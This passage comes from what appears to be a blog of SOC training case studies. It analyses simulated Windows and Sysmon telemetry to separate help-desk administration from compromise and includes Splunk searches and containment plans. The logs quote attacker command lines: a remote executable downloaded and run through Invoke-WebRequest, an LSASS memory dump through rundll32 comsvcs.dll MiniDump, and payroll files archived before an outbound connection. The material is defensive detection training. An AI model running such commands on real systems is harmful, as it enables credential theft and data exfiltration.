<p><code class="language-plaintext highlighter-rouge">CLIENT51</code> remains important because it is the source of the administrative session and may provide evidence about how the activity originated.</p>

<p><code class="language-plaintext highlighter-rouge">FILESERVER01</code> is also in scope because the account accessed a file there, although the available telemetry does <strong>not</strong> establish that the file was exfiltrated or modified.</p>

<hr />

<h1 id="8-first-splunk-search-and-pivots">8. First Splunk Search and Pivots</h1>

<p>My first investigation would begin with the account:</p>

<pre><code class="language-spl">index=wineventlog "HelpDesk03"
| table _time host EventCode Account_Name Logon_Type Source_Network_Address Process_Command_Line
| sort _time
</code></pre>

<p>The objective is to establish the broader activity associated with <code class="language-plaintext highlighter-rouge">HelpDesk03</code> before and after the observed sequence.</p>

<h3 id="pivot-1--authentication-session">Pivot 1 — Authentication Session</h3>

<p>After identifying the relevant <code class="language-plaintext highlighter-rouge">4624</code> event on <code class="language-plaintext highlighter-rouge">CLIENT51</code>, I would pivot using the associated <strong>LogonGUID</strong>.</p>

<p>The goal is to determine:</p>

<ul>
  <li>What processes were created under the session</li>
  <li>Whether additional activity occurred</li>
  <li>Whether the session appears normal for this account</li>
</ul>

<h3 id="pivot-2--process-execution">Pivot 2 — Process Execution</h3>

<p>I would then investigate the process chain around:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>powershell.exe
    ↓
inventory.exe
</code></pre></div></div>

<p>using <strong>ProcessGUID</strong> where available.</p>

<p>This allows the analyst to establish process ancestry and determine whether <code class="language-plaintext highlighter-rouge">inventory.exe</code> was genuinely launched by PowerShell.</p>

<h3 id="pivot-3--network-activity">Pivot 3 — Network Activity</h3>

<p>Finally, I would pivot around:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>inventory.exe
10.10.20.50
443
</code></pre></div></div>

<p>to identify:</p>

<ul>
  <li>DNS activity</li>
  <li>Other connections from the process</li>
  <li>Other hosts communicating with the destination</li>
  <li>Historical connections to the same destination</li>
  <li>Whether the destination is known corporate infrastructure</li>
</ul>

<hr />

<h1 id="9-evidence-required-before-declaring-inventoryexe-malicious">9. Evidence Required Before Declaring inventory.exe Malicious</h1>

<p>Before making a definitive malware determination, I would collect:</p>

<h3 id="file-intelligence">File intelligence</h3>

<ul>
  <li>SHA256 hash</li>
  <li>File size</li>
  <li>File creation timestamp</li>
  <li>Digital signature</li>
  <li>Certificate issuer</li>
  <li>File metadata</li>
  <li>PE information</li>
</ul>

<h3 id="endpoint-telemetry">Endpoint telemetry</h3>

<ul>
  <li>EDR detections</li>
  <li>Process tree</li>
  <li>Child processes</li>
  <li>Persistence mechanisms</li>
  <li>Registry modifications</li>
  <li>Additional file creation</li>
  <li>Scheduled tasks</li>
  <li>Services</li>
  <li>DLL loading</li>
</ul>

<h3 id="network-telemetry">Network telemetry</h3>

<ul>
  <li>DNS resolution</li>
  <li>Proxy logs</li>
  <li>Firewall logs</li>
  <li>Destination reputation</li>
  <li>Historical communication</li>
  <li>Other endpoints communicating with <code class="language-plaintext highlighter-rouge">10.10.20.50</code></li>
</ul>

<h3 id="threat-intelligence">Threat intelligence</h3>

<p>I would search the hash and relevant infrastructure against trusted threat-intelligence sources.</p>

<p>Importantly, <strong>I would not rely solely on IP reputation</strong>. A suspicious-looking IP is an investigation lead, not definitive proof of compromise.</p>

<hr />

<h1 id="10-what-would-prove-this-was-legitimate">10. What Would Prove This Was Legitimate?</h1>

<p>There are several pieces of evidence that could substantially reduce the suspicion.</p>

<h3 id="change-or-helpdesk-ticket">Change or Helpdesk Ticket</h3>

<p>A legitimate ticket could show:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>HelpDesk03
    ↓
CLIENT50
    ↓
Software inventory collection
</code></pre></div></div>

<p>with the activity occurring during the approved support window.</p>

<h3 id="software-deployment-record">Software Deployment Record</h3>

<p>The organization may have an approved inventory-management tool that downloads:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>inventory.zip
</code></pre></div></div>

<p>and executes:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>inventory.exe
</code></pre></div></div>

<h3 id="asset-management-documentation">Asset Management Documentation</h3>

<p>The domain or IP:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>updates-example.net
10.10.20.50
</code></pre></div></div>

<p>could belong to an approved enterprise software-management platform.</p>

<h3 id="known-good-hash">Known-Good Hash</h3>

<p>If the SHA256 hash of <code class="language-plaintext highlighter-rouge">inventory.exe</code> matches the organization’s approved software inventory agent, the risk assessment changes substantially.</p>

<h3 id="digital-signature">Digital Signature</h3>

<p>A valid signature from the expected software vendor would provide another important validation point.</p>

<h3 id="normal-historical-behavior">Normal Historical Behavior</h3>

<p>If <code class="language-plaintext highlighter-rouge">HelpDesk03</code> routinely:</p>

<ul>
  <li>Logs onto <code class="language-plaintext highlighter-rouge">CLIENT51</code></li>
  <li>Remotes into <code class="language-plaintext highlighter-rouge">CLIENT50</code></li>
  <li>Accesses <code class="language-plaintext highlighter-rouge">SoftwareInventory.xlsx</code></li>
  <li>Downloads <code class="language-plaintext highlighter-rouge">inventory.exe</code></li>
  <li>Communicates with <code class="language-plaintext highlighter-rouge">10.10.20.50</code></li>
</ul>

<p>then the activity may represent legitimate IT operations.</p>

<hr />

<h1 id="11-containment">11. Containment</h1>

<p>Because <code class="language-plaintext highlighter-rouge">CLIENT50</code> is the host where the suspicious executable executes and establishes an outbound connection, I would prioritize containment of <code class="language-plaintext highlighter-rouge">CLIENT50</code>.</p>

<h3 id="priority-1--isolate-client50">Priority 1 — Isolate CLIENT50</h3>

<p>Prevent further communication with:</p>

<ul>
  <li>Internal systems</li>
  <li>Domain resources</li>
  <li>External infrastructure</li>
</ul>

<p>while preserving evidence where possible.</p>

<h3 id="priority-2--investigate-helpdesk03">Priority 2 — Investigate HelpDesk03</h3>

<p>Temporarily restrict or disable the account if the evidence indicates credential compromise.</p>

<p>I would also:</p>

<ul>
  <li>Revoke active sessions</li>
  <li>Reset credentials</li>
  <li>Review authentication history</li>
  <li>Investigate privileged group membership</li>
  <li>Check for other systems accessed by the account</li>
</ul>

<h3 id="priority-3--investigate-client51">Priority 3 — Investigate CLIENT51</h3>

<p><code class="language-plaintext highlighter-rouge">CLIENT51</code> should not automatically be declared compromised.</p>

<p>However, because it initiated the PowerShell remoting session, I would investigate it for:</p>

<ul>
  <li>Suspicious processes</li>
  <li>Credential theft</li>
  <li>Malware</li>
  <li>PowerShell activity</li>
  <li>Unusual authentication</li>
  <li>Evidence of compromise preceding the observed timeline</li>
</ul>

<h3 id="priority-4--protect-fileserver01">Priority 4 — Protect FILESERVER01</h3>

<p>I would review the file access and determine whether:</p>

<ul>
  <li>Additional files were accessed</li>
  <li>Files were modified</li>
  <li>Files were copied</li>
  <li>Unusual authentication occurred</li>
  <li>Other systems accessed the same share</li>
</ul>

<hr />

<h1 id="soc-assessment">SOC Assessment</h1>

<p>The most important lesson from this case is that <strong>Helpdesk activity can look very similar to attacker activity</strong>.</p>

<p>The initial sequence:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>HelpDesk03
    ↓
CLIENT51
    ↓
PowerShell
    ↓
CLIENT50
    ↓
FILESERVER01
</code></pre></div></div>

<p>can plausibly represent normal IT administration.</p>

<p>The risk changes when the investigation reaches:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Invoke-WebRequest
        ↓
inventory.zip
        ↓
inventory.exe
        ↓
Outbound HTTPS
</code></pre></div></div>

<p>At that point, the analyst has enough evidence to escalate the activity and begin validating whether the executable and infrastructure are authorized.</p>

<p>This investigation reinforced the importance of:</p>

<ul>
  <li>Context-based triage</li>
  <li>Authentication correlation</li>
  <li>PowerShell monitoring</li>
  <li>Process ancestry</li>
  <li>Network telemetry</li>
  <li>File analysis</li>
  <li>Threat intelligence</li>
  <li>Change-management validation</li>
  <li>Distinguishing suspicious activity from confirmed compromise</li>
</ul>

<hr />

<h1 id="key-soc-takeaway">Key SOC Takeaway</h1>

<p>A strong SOC analyst should not ask:</p>

<blockquote>
  <p><strong>“Does this event look malicious?”</strong></p>
</blockquote>

<p>They should ask:</p>

<blockquote>
  <p><strong>“Does this sequence of events make sense for this user, this host, and this business function?”</strong></p>
</blockquote>

<p>That shift from <strong>event-based detection to contextual investigation</strong> is one of the most important skills I am continuing to develop through these hands-on SOC exercises.</p>

<hr />

<h2 id="skills-practiced">Skills Practiced</h2>

<p><code class="language-plaintext highlighter-rouge">Splunk</code> · <code class="language-plaintext highlighter-rouge">SPL</code> · <code class="language-plaintext highlighter-rouge">Windows Event Logs</code> · <code class="language-plaintext highlighter-rouge">PowerShell Logging</code> · <code class="language-plaintext highlighter-rouge">Sysmon</code> · <code class="language-plaintext highlighter-rouge">Authentication Analysis</code> · <code class="language-plaintext highlighter-rouge">Kerberos</code> · <code class="language-plaintext highlighter-rouge">Process Correlation</code> · <code class="language-plaintext highlighter-rouge">Network Analysis</code> · <code class="language-plaintext highlighter-rouge">Threat Hunting</code> · <code class="language-plaintext highlighter-rouge">Incident Triage</code></p>

<hr />

<h2 id="author">Author</h2>

<p><strong>Precious Anyanwu</strong></p>

<table>
  <tbody>
    <tr>
      <td>Cybersecurity</td>
      <td>SOC Analysis</td>
      <td>Cloud Security</td>
      <td>Threat Detection</td>
    </tr>
  </tbody>
</table>]]></content><author><name>Precious Cyber6ixxx</name></author><summary type="html"><![CDATA[Splunk SOC Investigation Case Study: HelpDesk03 — Legitimate Administration or Compromise?]]></summary></entry><entry><title type="html">Soc Investigation The Missing Beginning</title><link href="/2026/08/10/SOC-Investigation-The-Missing-Beginning.html" rel="alternate" type="text/html" title="Soc Investigation The Missing Beginning" /><published>2026-08-10T00:00:00+00:00</published><updated>2026-08-10T00:00:00+00:00</updated><id>/2026/08/10/SOC-Investigation-The-Missing-Beginning</id><content type="html" xml:base="/2026/08/10/SOC-Investigation-The-Missing-Beginning.html"><![CDATA[<h1 id="soc-investigation-case-study-the-missing-beginning">SOC Investigation Case Study: The Missing Beginning</h1>

<h2 id="overview">Overview</h2>

<p>This case study simulates a SOC investigation in which the beginning of an attack is not fully visible in the available telemetry.</p>

<p>The objective was to investigate a sequence of Windows events involving:</p>

<ul>
  <li><code class="language-plaintext highlighter-rouge">FinanceUser02</code></li>
  <li><code class="language-plaintext highlighter-rouge">CLIENT31</code></li>
  <li><code class="language-plaintext highlighter-rouge">CLIENT30</code></li>
  <li><code class="language-plaintext highlighter-rouge">DC01</code></li>
  <li><code class="language-plaintext highlighter-rouge">FILESERVER01</code></li>
</ul>

<p>The investigation required distinguishing legitimate user activity from suspicious behavior, identifying the first meaningful indicators of compromise, reconstructing the attack chain, and clearly separating <strong>confirmed evidence from hypotheses</strong>.</p>

<p>A key challenge in this investigation was that the telemetry begins <strong>after the potential initial compromise</strong>. This means the investigation cannot definitively establish how the attacker first obtained access.</p>

<hr />

<h1 id="investigation-scenario">Investigation Scenario</h1>

<p>The available telemetry is presented below in chronological order.</p>

<h2 id="full-telemetry-under-investigation">Full Telemetry Under Investigation</h2>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>09:11:04  CLIENT30
4624
Account: FinanceUser02
Logon Type: 2

09:11:19  CLIENT30
4688
OUTLOOK.EXE

09:12:03  CLIENT30
4688
EXCEL.EXE
Command:
"C:\Finance\Budget2026.xlsx"

09:14:17  CLIENT30
4104
Get-Date

09:16:42  CLIENT30
4624
Account: FinanceUser02
Logon Type: 3
Source: CLIENT31

09:16:49  CLIENT30
4688
powershell.exe
Parent: wsmprovhost.exe

09:17:03  CLIENT30
4104
Get-Process

09:17:22  CLIENT30
4104
Get-ADComputer -Filter *

09:17:41  DC01
4769
Account: FinanceUser02
Service:
ldap/DC01

09:18:05  CLIENT30
4104
Get-ADGroupMember "Domain Admins"

09:18:47  CLIENT30
Sysmon 3
powershell.exe
→ 91.198.174.21
Port: 443

09:19:02  CLIENT30
4104
Invoke-WebRequest
https://cdn-example.net/agent.exe

09:19:11  CLIENT30
Sysmon 11
File Created:
C:\ProgramData\agent.exe

09:19:38  CLIENT30
4688
agent.exe
Parent:
powershell.exe

09:20:02  CLIENT30
Sysmon 3
agent.exe
→ 91.198.174.21
Port: 443

09:21:15  CLIENT30
4688
rundll32.exe

Command:
comsvcs.dll, MiniDump
612
C:\ProgramData\lsass.dmp
full

09:21:21  CLIENT30
Sysmon 11
File Created:
C:\ProgramData\lsass.dmp

09:21:36  CLIENT30
4104
Remove-Item
C:\ProgramData\lsass.dmp

09:22:07  DC01
4769
Account: FinanceUser02
Service:
cifs/FILESERVER01

09:22:15  FILESERVER01
4624
Account: FinanceUser02
Logon Type: 3
Source: CLIENT30

09:22:43  FILESERVER01
4663
Object:
\\FILESERVER01\Finance\Payroll2026.xlsx

Access:
ReadData

09:23:04  FILESERVER01
4663
Object:
\\FILESERVER01\Finance\Payroll2026.xlsx

Access:
WriteData

09:23:51  CLIENT30
4688
powershell.exe

Compress-Archive
C:\Users\FinanceUser02\Downloads\Payroll2026.xlsx
C:\Users\FinanceUser02\Downloads\Payroll.zip

09:24:13  CLIENT30
Sysmon 3
powershell.exe
→ 91.198.174.21
Port: 443
</code></pre></div></div>

<hr />

<h1 id="1-where-does-legitimate-activity-end">1. Where Does Legitimate Activity End?</h1>

<p>My assessment is that the last event I would consider <strong>potentially legitimate</strong> is:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>09:17:41
DC01
4769
Account: FinanceUser02
Service: ldap/DC01
</code></pre></div></div>

<p>The preceding activity can reasonably fit normal administrative or user troubleshooting behavior:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>FinanceUser02
      ↓
CLIENT30
      ↓
PowerShell
      ↓
Get-Date
      ↓
Get-Process
      ↓
Get-ADComputer -Filter *
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">4769</code> LDAP service ticket is also not inherently malicious. Active Directory queries can legitimately generate Kerberos service ticket activity.</p>

<p>However, immediately afterward we see:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>09:18:05
Get-ADGroupMember "Domain Admins"
</code></pre></div></div>

<p>The context changes significantly at this point.</p>

<p>The account is a finance user, yet it is querying membership of the highly privileged <strong>Domain Admins</strong> group shortly before making an outbound connection and downloading an executable.</p>

<p>Therefore, I treat the activity after the LDAP ticket as increasingly suspicious rather than assuming that the LDAP event itself represents compromise.</p>

<hr />

<h1 id="2-first-genuine-suspicion">2. First Genuine Suspicion</h1>

<p>My first significant point of suspicion is:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>09:18:05
CLIENT30
4104

Get-ADGroupMember "Domain Admins"
</code></pre></div></div>

<p>The command itself is not inherently malicious.</p>

<p>A legitimate administrator may need to determine group membership during troubleshooting or security administration.</p>

<p>The concern comes from the <strong>sequence and context</strong>:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Get-ADComputer -Filter *
        ↓
Get-ADGroupMember "Domain Admins"
        ↓
Outbound connection
        ↓
Invoke-WebRequest
        ↓
agent.exe
</code></pre></div></div>

<p>The combination suggests systematic reconnaissance followed by potential payload delivery.</p>

<p>At this stage, I would classify the activity as:</p>

<h2 id="suspicious">Suspicious</h2>

<p>I would continue monitoring and investigating rather than immediately declaring an incident.</p>

<hr />

<h1 id="3-when-does-this-become-an-incident">3. When Does This Become an Incident?</h1>

<p>The incident threshold is crossed at:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>09:19:38
CLIENT30

4688
agent.exe
Parent:
powershell.exe
</code></pre></div></div>

<p>By this point, the evidence is no longer limited to reconnaissance.</p>

<p>We have a clear execution chain:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>PowerShell
     ↓
Invoke-WebRequest
     ↓
agent.exe created
     ↓
agent.exe executed
</code></pre></div></div>

<p>The executable was downloaded from an external location:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>https://cdn-example.net/agent.exe
</code></pre></div></div>

<p>and subsequently executed.</p>

<p>This provides significantly stronger evidence of malicious activity than the earlier discovery commands.</p>

<p>The incident becomes even more compelling when <code class="language-plaintext highlighter-rouge">agent.exe</code> immediately communicates with:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>91.198.174.21:443
</code></pre></div></div>

<p>This creates a behavioral chain consistent with:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Reconnaissance
      ↓
Payload download
      ↓
Payload execution
      ↓
External communication
</code></pre></div></div>

<p>At this point, I would formally escalate the investigation as a security incident.</p>

<hr />

<h1 id="4-the-missing-beginning">4. The Missing Beginning</h1>

<p>One of the most important aspects of this investigation is that the available telemetry does <strong>not</strong> show how the attacker initially obtained access.</p>

<p>At:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>09:16:42
CLIENT30
4624
Account: FinanceUser02
Logon Type: 3
Source: CLIENT31
</code></pre></div></div>

<p>we observe a network logon to CLIENT30 originating from CLIENT31.</p>

<p>Immediately afterward:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>09:16:49
powershell.exe
Parent: wsmprovhost.exe
</code></pre></div></div>

<p>This suggests PowerShell execution through a remote management context.</p>

<p>However, this does not by itself prove that CLIENT31 was compromised.</p>

<hr />

<h1 id="initial-hypotheses">Initial Hypotheses</h1>

<p>I would investigate several possibilities.</p>

<h3 id="hypothesis-1--financeuser02-credentials-were-compromised">Hypothesis 1 — FinanceUser02 Credentials Were Compromised</h3>

<p>This is my leading hypothesis.</p>

<p>The attacker may have obtained FinanceUser02 credentials before the beginning of the available telemetry and subsequently used them from CLIENT31 to access CLIENT30.</p>

<p>This would explain:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>CLIENT31
    ↓
FinanceUser02 credentials
    ↓
CLIENT30
    ↓
PowerShell
</code></pre></div></div>

<h3 id="hypothesis-2--client31-was-compromised">Hypothesis 2 — CLIENT31 Was Compromised</h3>

<p>CLIENT31 may have been compromised first, with the attacker using it as a staging point to access CLIENT30.</p>

<p>Evidence currently available is insufficient to confirm this.</p>

<h3 id="hypothesis-3--legitimate-remote-administration">Hypothesis 3 — Legitimate Remote Administration</h3>

<p>It is also possible that a legitimate remote administrative session occurred from CLIENT31.</p>

<p>However, this hypothesis becomes increasingly difficult to sustain once the session is followed by:</p>

<ul>
  <li>Domain Admin enumeration</li>
  <li>External network communication</li>
  <li>Payload download</li>
  <li>Payload execution</li>
  <li>LSASS dumping</li>
  <li>File server access</li>
  <li>Payroll data modification</li>
</ul>

<p>Therefore, I would investigate the legitimacy of the original remote session rather than assume it was malicious from the beginning.</p>

<hr />

<h1 id="5-reconstructing-the-attack-chain">5. Reconstructing the Attack Chain</h1>

<p>The available evidence supports the following attack narrative:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Potential prior compromise / credential theft
                    ↓
              CLIENT31
                    ↓
        FinanceUser02 credentials
                    ↓
              CLIENT30
                    ↓
        Remote PowerShell execution
                    ↓
       Active Directory discovery
                    ↓
      Domain Admin enumeration
                    ↓
        External communication
                    ↓
       PowerShell payload download
                    ↓
             agent.exe
                    ↓
          Payload execution
                    ↓
       External communication
                    ↓
          LSASS memory dump
                    ↓
        Dump file deletion
                    ↓
         FILESERVER01 access
                    ↓
      Payroll2026.xlsx read/write
                    ↓
          Archive creation
                    ↓
      Possible data exfiltration
</code></pre></div></div>

<p>The final stage should remain classified as <strong>potential exfiltration</strong>, not confirmed exfiltration.</p>

<p>The final outbound connection to <code class="language-plaintext highlighter-rouge">91.198.174.21:443</code> occurs after the archive is created, but the telemetry provided does not demonstrate that <code class="language-plaintext highlighter-rouge">Payroll.zip</code> was actually transmitted.</p>

<p>That distinction is important during an investigation.</p>

<hr />

<h1 id="6-credential-access">6. Credential Access</h1>

<p>At:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>09:21:15
rundll32.exe

comsvcs.dll, MiniDump
612
C:\ProgramData\lsass.dmp
full
</code></pre></div></div>

<p>the investigation reaches another major escalation point.</p>

<p>The command attempts to create a full memory dump of the LSASS process.</p>

<p>LSASS is responsible for important Windows authentication functionality, making LSASS memory a high-value target for credential theft.</p>

<p>The subsequent telemetry confirms the dump file was created:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>09:21:21
Sysmon Event 11

C:\ProgramData\lsass.dmp
</code></pre></div></div>

<p>The attacker then attempted to remove the evidence:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>09:21:36
Remove-Item
C:\ProgramData\lsass.dmp
</code></pre></div></div>

<p>This represents strong evidence of credential-access activity followed by possible defense evasion.</p>

<hr />

<h1 id="7-access-to-sensitive-data">7. Access to Sensitive Data</h1>

<p>The attacker subsequently requested access to:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>FILESERVER01
</code></pre></div></div>

<p>The authentication sequence was:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>DC01
4769
cifs/FILESERVER01
        ↓
FILESERVER01
4624
Logon Type 3
Source: CLIENT30
</code></pre></div></div>

<p>The attacker then accessed:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>\\FILESERVER01\Finance\Payroll2026.xlsx
</code></pre></div></div>

<p>with:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ReadData
</code></pre></div></div>

<p>followed by:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>WriteData
</code></pre></div></div>

<p>This is particularly important because the activity has now progressed beyond endpoint compromise into access to potentially sensitive business information.</p>

<p>The <code class="language-plaintext highlighter-rouge">WriteData</code> event also warrants investigation into what was changed and whether the file was modified maliciously.</p>

<hr />

<h1 id="8-potential-data-exfiltration">8. Potential Data Exfiltration</h1>

<p>The attacker subsequently created:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Payroll.zip
</code></pre></div></div>

<p>using:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Compress-Archive
</code></pre></div></div>

<p>This is consistent with preparation of data for possible exfiltration.</p>

<p>The final telemetry shows:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>PowerShell
    ↓
91.198.174.21:443
</code></pre></div></div>

<p>However, I would <strong>not state that exfiltration was confirmed</strong> based on these events alone.</p>

<p>I would investigate:</p>

<ul>
  <li>Proxy logs</li>
  <li>Firewall logs</li>
  <li>Network flow telemetry</li>
  <li>EDR network telemetry</li>
  <li>TLS inspection where available</li>
  <li>DNS activity</li>
  <li>The actual archive file</li>
  <li>Destination reputation</li>
  <li>Amount of data transmitted</li>
</ul>

<p>The correct assessment at this stage is:</p>

<blockquote>
  <p><strong>Potential data exfiltration requiring further investigation.</strong></p>
</blockquote>

<hr />

<h1 id="9-first-splunk-search">9. First Splunk Search</h1>

<p>My initial Splunk investigation would focus on the identity involved:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>FinanceUser02
</code></pre></div></div>

<p>I would search activity surrounding the earliest and latest observed events to determine what happened before the visible attack chain.</p>

<p>For example:</p>

<pre><code class="language-spl">index=wineventlog
Account_Name="FinanceUser02"
earliest=-4h latest=+2h
| table _time host EventCode Account_Name Logon_Type Source_Network_Address Process_Command_Line
| sort _time
</code></pre>

<p>Depending on the field normalization in the environment, I would adjust the account and source fields accordingly.</p>

<p>The objective is not simply to retrieve more logs.</p>

<p>The objective is to answer:</p>

<blockquote>
  <p><strong>Where has FinanceUser02 authenticated, from which systems, and what did the account do before the attack became visible?</strong></p>
</blockquote>

<hr />

<h1 id="10-investigation-pivots">10. Investigation Pivots</h1>

<h2 id="pivot-1--logonguid">Pivot 1 — LogonGUID</h2>

<p>I would identify the network logon from CLIENT31 to CLIENT30:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>09:16:42
FinanceUser02
Type 3
Source: CLIENT31
</code></pre></div></div>

<p>I would then pivot using the associated <code class="language-plaintext highlighter-rouge">LogonGUID</code> where available.</p>

<p>This helps establish which events belong to the authentication session.</p>

<hr />

<h2 id="pivot-2--processguid">Pivot 2 — ProcessGUID</h2>

<p>After identifying the suspicious PowerShell execution and the downloaded payload, I would pivot using <code class="language-plaintext highlighter-rouge">ProcessGUID</code>.</p>

<p>This helps reconstruct process relationships such as:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>wsmprovhost.exe
       ↓
powershell.exe
       ↓
agent.exe
</code></pre></div></div>

<hr />

<h2 id="pivot-3--account--source-host">Pivot 3 — Account + Source Host</h2>

<p>Finally, I would search for:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>FinanceUser02
</code></pre></div></div>

<p>across:</p>

<ul>
  <li>CLIENT31</li>
  <li>CLIENT30</li>
  <li>FILESERVER01</li>
  <li>DC01</li>
</ul>

<p>This could reveal whether the account was being used from additional systems or whether this activity represents an abnormal authentication pattern.</p>

<hr />

<h1 id="11-scope-assessment">11. Scope Assessment</h1>

<p>It is important not to classify every system involved as “compromised.”</p>

<h2 id="confirmed-compromised">Confirmed Compromised</h2>

<h3 id="client30">CLIENT30</h3>

<p>CLIENT30 is the primary confirmed compromised endpoint.</p>

<p>Evidence includes:</p>

<ul>
  <li>Suspicious PowerShell activity</li>
  <li>External payload download</li>
  <li><code class="language-plaintext highlighter-rouge">agent.exe</code> creation</li>
  <li><code class="language-plaintext highlighter-rouge">agent.exe</code> execution</li>
  <li>External communication</li>
  <li>LSASS memory dumping</li>
  <li>Dump file deletion</li>
  <li>File server access</li>
  <li>Sensitive data access</li>
  <li>Archive creation</li>
</ul>

<hr />

<h2 id="potentially-compromised">Potentially Compromised</h2>

<h3 id="client31">CLIENT31</h3>

<p>CLIENT31 is potentially compromised because it was the source of the network logon into CLIENT30 using FinanceUser02.</p>

<p>However, the available telemetry does not establish whether CLIENT31 itself was compromised.</p>

<p>I would therefore investigate it immediately rather than label it confirmed compromised.</p>

<hr />

<h2 id="affected-systems">Affected Systems</h2>

<h3 id="fileserver01">FILESERVER01</h3>

<p>FILESERVER01 should be considered affected because compromised credentials were used to access a sensitive finance file.</p>

<p>However, there is currently insufficient evidence to conclude that FILESERVER01 itself was compromised.</p>

<p>The distinction is:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>CLIENT30
Confirmed compromised

CLIENT31
Potentially compromised

FILESERVER01
Affected by unauthorized access
</code></pre></div></div>

<p>This distinction is important when communicating incident scope to management.</p>

<hr />

<h1 id="12-immediate-containment">12. Immediate Containment</h1>

<p>Given the evidence, I would prioritize containment as follows.</p>

<h3 id="1-isolate-client30">1. Isolate CLIENT30</h3>

<p>CLIENT30 is actively compromised and has executed a payload.</p>

<p>Network isolation would limit:</p>

<ul>
  <li>Further command and control</li>
  <li>Lateral movement</li>
  <li>Credential theft</li>
  <li>Additional data access</li>
  <li>Potential exfiltration</li>
</ul>

<hr />

<h3 id="2-disable-or-restrict-financeuser02">2. Disable or Restrict FinanceUser02</h3>

<p>Temporarily disable the account or otherwise restrict authentication while the investigation determines whether its credentials were compromised.</p>

<p>I would also:</p>

<ul>
  <li>Revoke active sessions</li>
  <li>Reset the password</li>
  <li>Invalidate existing authentication tokens where supported</li>
  <li>Require MFA where applicable</li>
  <li>Investigate where the account authenticated</li>
</ul>

<hr />

<h3 id="3-protect-fileserver01">3. Protect FILESERVER01</h3>

<p>Restrict unnecessary access to the Finance share while preserving evidence.</p>

<p>I would also investigate the modified:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Payroll2026.xlsx
</code></pre></div></div>

<p>to determine:</p>

<ul>
  <li>What changed</li>
  <li>Who changed it</li>
  <li>Whether malicious content was introduced</li>
  <li>Whether the modification can be attributed to the attacker</li>
</ul>

<hr />

<h3 id="4-investigate-client31">4. Investigate CLIENT31</h3>

<p>CLIENT31 should immediately become a priority investigative target.</p>

<p>I would determine:</p>

<ul>
  <li>Who was logged into CLIENT31</li>
  <li>Whether FinanceUser02 was legitimately being used</li>
  <li>Whether PowerShell was executed</li>
  <li>Whether remote administration tools were used</li>
  <li>Whether credential theft occurred</li>
  <li>Whether suspicious network connections originated from CLIENT31</li>
  <li>What happened before 09:16:42</li>
</ul>

<hr />

<h1 id="13-additional-telemetry-i-would-investigate">13. Additional Telemetry I Would Investigate</h1>

<p>I would collect and correlate:</p>

<h3 id="authentication-telemetry">Authentication telemetry</h3>

<ul>
  <li>Event ID 4624</li>
  <li>Event ID 4625</li>
  <li>Event ID 4672</li>
  <li>Kerberos 4768</li>
  <li>Kerberos 4769</li>
</ul>

<p>This helps establish authentication patterns and privilege use.</p>

<h3 id="powershell-telemetry">PowerShell telemetry</h3>

<ul>
  <li>Event ID 4104</li>
  <li>PowerShell Operational logs</li>
  <li>Command-line telemetry</li>
  <li>Parent/child process relationships</li>
</ul>

<p>This could reveal additional commands executed by the attacker.</p>

<h3 id="sysmon-telemetry">Sysmon telemetry</h3>

<ul>
  <li>Event ID 1 — Process creation</li>
  <li>Event ID 3 — Network connection</li>
  <li>Event ID 11 — File creation</li>
  <li>Event ID 22 — DNS queries</li>
</ul>

<p>These can help reconstruct execution, network communication, payload creation, and destination resolution.</p>

<h3 id="endpoint-telemetry">Endpoint telemetry</h3>

<p>I would also investigate EDR alerts and endpoint observations on CLIENT30 and CLIENT31 for:</p>

<ul>
  <li>Credential dumping</li>
  <li>Malware execution</li>
  <li>Persistence</li>
  <li>Privilege escalation</li>
